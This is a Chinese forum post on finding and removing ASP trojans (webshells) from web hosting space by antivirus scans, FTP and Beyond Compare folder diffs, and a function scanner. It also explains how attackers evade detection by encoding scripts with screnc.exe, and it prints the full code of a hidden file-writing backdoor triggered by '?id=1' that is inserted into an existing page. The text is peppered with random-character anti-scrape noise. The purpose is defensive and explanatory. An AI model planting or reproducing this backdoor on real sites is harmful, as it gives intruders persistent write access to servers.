 TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
$ d2 w. @& ~7 j( `) ]2 O; i7 _# M3 N4 ]! \. h
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。 ' p7 n5 Q' P$ Y
7 U- H, w7 U3 _; Z
一.技巧1:杀毒软件查杀
. l: U) g& s- N& M. P
/ ^) @, a: h' H! i一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。 : S1 I' V! I; q
6 }9 F) s( p y1 Y2 K# V
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。 ( m4 b! x! g3 a9 k3 B" c: g0 q" W
( S, L0 \2 j' r Y5 A! ^/ }9 B
二.技巧2:FTP客户端对比 ; J- {( W0 U) a7 B4 H/ K; k
' u/ q$ N0 p/ ?: o% H# `9 O上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 2 K+ P+ s8 b' l" }
% N* x) h6 C: u" k8 e( ?! ]' escrenc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。
. l, o- m& | J3 w) q+ l# X
) ?! `# p' A) z& C; K* E经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
- D- W8 S) X C. e& k" ?+ E, `5 ~+ o# w6 R" C
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 " t$ R1 `! P& h( R: M
J1 y. e8 K$ O- C' E盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。 ; x- Z. C/ [, M& r' q1 r
/ c$ R2 k* l. y6 @) X" ?9 E- [所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 9 b8 ?$ q( H, G
+ E9 N- A' e9 c这里以FlashFXP进行操作讲解。
& @6 |+ ^) g+ V+ W; S
3 J' N: p! L* N- N) @7 ^% r- O步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
$ o' ~. r- A! v4 u2 G3 n$ n) d& n0 E$ H7 g- f0 f2 r
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 ! I: C% @# r8 ]) S* k! i# V5 h
- f2 | W3 @2 ?' t0 y# ^' X: ^
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。
6 D( P* D6 E# g, A" h5 B' i5 v三.技巧3:用Beyond Compare 2进行对比 4 h6 g' D! |* a, f$ N# H
4 n7 Z$ v5 b. Y6 ^/ m! J上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: + ?; N) t4 G$ C% @& n/ B6 F
$ j8 A2 D. C1 o- v1 D% a J8 K〈%
1 |% c U- j8 Z/ t. m$ X4 a7 m" [, R( Z" L0 W" S5 c4 q
on error resume next % r3 `) A1 k4 p0 E% L% W7 `
1 K7 G& e q0 O0 Q8 M7 F8 h9 wid=request("id")
$ H+ _1 i3 }0 A& a6 Q7 m. {( L6 e. `. ?
if request("id")=1 then , H; y2 |9 L" ~
# I; v! i, g1 E, F
testfile=Request.form("name")
9 L6 d/ O6 W }; y. Z3 O. `& h$ J- w( G3 e/ u' \5 N
msg=Request.form("message") $ A: T- Y9 X% F5 }3 v# e
; f {# b; D6 x1 ^! L' K; P
set fs=server.CreatObject("scripting.filesystemobject") 8 T- X- O; z# e; T
& C+ K" B: X( m W2 a+ @set thisfile=fs.openTestFile(testfile,8,True,0)
( s S( F( I1 S! N1 O) L+ g4 Q! @0 k' J3 Z( u
thisfile.Writeline(""&msg&"") H* q4 J4 K+ [- |3 s* v; X% i$ V
$ X6 V9 a! l0 i7 s' t2 O! o7 Uthisfile.close 0 \& D0 j& j2 c/ y; a5 {( y) r D
0 C6 z5 G3 t0 x- V* }9 v; c/ g
set fs=nothing ' F' N; N. l! v* P7 B: b' ?, ^
% {5 D! L6 n( {& I& H
%〉
# W2 G P4 z& T' t3 y5 h2 n$ a' _' L* d. B! O
〈from method="post" Action="保存"?id=1〉 : f( j1 M; z$ L$ E9 t
" U( ^6 B! Q. Z* s' W* n! u# ]: ]% w〈input type="text" size="20" name="Name" ( C- {, v3 f0 m( J6 d2 k) P
- q; [( h5 V* GValue=〈%=server.mappath("XP.ASP")%〉〉
3 ?2 r2 x9 e6 B6 ~$ y; A! f# o( @ N: A
〈textarea name="Message" class=input〉
: x9 h# D+ [& U6 U( {
3 ?$ G1 d4 O5 {# ]
: a3 D2 h9 }" b7 B〈/textarea〉 & E' }3 n7 |, O7 N1 Y( V5 T: I X
: s; B4 s, ^: X: u2 S; x- k
〈input type="Submit" name="send" Value="生成"
" S1 c$ Y! m$ N! [9 H y! G
% U" F, @1 a$ ^; @class=input〉
! t X4 }' F; X! t% w/ x
4 ~6 Y( h' @" E! J2 @% L〈/from〉 1 f, k" h" A( Z- m9 H1 a
0 n4 Y c/ J+ w0 {' U
〈%end if%〉
. j( C j2 h9 l3 u. Z! T1 M4 d2 I( O9 h) U
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。
: T' z4 i% d+ h6 O+ w8 o& }7 S& c: h
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。 ( Q5 X6 w9 a" F' k8 ?, t
! v- ]; _" n& o* Q: W: |这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。
# o" q/ A8 L3 Z: {5 }
8 g; L7 D5 t% O3 ?# h, w1 jBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
: z$ D1 E4 m7 b" l$ w: Z8 G! j& b' W3 I, @" ]
看我来利用它完成渗透性asp木马的查找。
7 }9 P+ z3 y! A K* M
. }) n9 w u) p4 ], y步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。 + |' Y8 P) V' L3 o
$ C5 o+ U; T( I( `3 E步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 8 t, u# g* O6 I# ]& u- }
" L1 p/ P% A9 J; H% A
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! ) y; F. o% w% T% h$ \# n- |
V) ?! a( C$ ~6 I( o! M9 z0 \; {2 M* x) ?2 `7 p1 a" [
四.技巧4:利用组件性能找asp木马 ; R5 y- T, W4 x4 V) U
# _3 L# Z2 i" O
上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
& K- H( B5 T g' _4 O+ W" _( f9 ?9 [8 I: q: f S
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 ! q1 |& D5 i m8 C4 b
. e- c4 D! l! c
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 ; a% _3 `/ V5 f
6 ~1 G/ n* n0 o0 T7 T b使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
$ F/ x) O; v( C& a9 L+ ^. R: I/ _, y! x$ y
一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。 ) d" T- ?( r; L B
5 U' y1 r, N0 ]2 e1 V$ d$ C
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主